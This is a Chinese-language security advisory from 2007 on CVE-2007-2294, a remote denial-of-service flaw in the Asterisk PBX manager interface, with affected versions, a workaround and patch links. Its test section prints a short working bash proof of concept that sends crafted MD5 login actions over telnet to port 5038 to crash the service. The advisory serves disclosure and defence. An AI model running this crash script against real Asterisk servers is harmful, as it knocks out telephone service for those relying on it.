安全研究

安全漏洞
Asterisk管理员接口远程拒绝服务漏洞

发布日期:2007-04-24
更新日期:2007-04-25

受影响系统:
Asterisk Asterisk 1.4.x
Asterisk Asterisk 1.2.x
Asterisk Asterisk 1.0.x
Asterisk Business Edition B.x.x
Asterisk Business Edition A.x.x
Asterisk AsteriskNOW <= Beta5
Asterisk Appliance Developer Kit 0.x.x
不受影响系统:
Asterisk Asterisk 1.4.3
Asterisk Asterisk 1.2.18
Asterisk Business Edition B.1.3.3
Asterisk AsteriskNOW Beta6
Asterisk Appliance Developer Kit 0.4.0
描述:
BUGTRAQ  ID: 23649
CVE(CAN) ID: CVE-2007-2294

Asterisk是一款PBX系统的软件,运行在Linux系统上,支持使用SIP、IAX、H323协议进行IP通话。

Asterisk的管理接口实现上存在远程拒绝服务漏洞,远程攻击者可能利用此漏洞导致程序崩溃。

如果在manager.conf文件中配置了无需口令的管理员用户,则攻击者在试图使用该用户名和MD5认证进行连接时,Asterisk就会引用空指针并崩溃。

<*来源:Digium Technical Support (russell@digium.com
  
  链接:http://marc.info/?l=full-disclosure&m=117746345316099&w=2
        http://secunia.com/advisories/24977/
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/bin/bash                                              
                                                          
function text1() {                                      
                                                          
cat <<- EOF                                              
                                                          
action: Challenge                                        
                                                          
actionid: 0#                                            
                                                          
authtype: MD5                                            
                                                          
EOF                                                      
                                                          
}                                                        
                                                          
function text2() {                                      
                                                          
cat <<- EOF                                              
                                                          
action: Login                                            
                                                          
actionid: 1#                                            
                                                          
key: textstringhere                                      
                                                          
username: testuser                                      
                                                          
authtype: MD5                                            
                                                          
EOF                                                      
                                                          
}                                                        
                                                          
(sleep 1; text1; sleep 1; text2 ) | telnet 127.0.0.1    
5038

建议:
临时解决方法:

* 不要在manager.conf中配置帐号,或完全禁用管理员接口。

厂商补丁:

Asterisk
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

ftp://ftp.digium.com/pub/telephony/asterisk
ftp://ftp.digium.com/pub/telephony/aadk/  
http://www.asterisknow.org/

浏览次数:3293
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障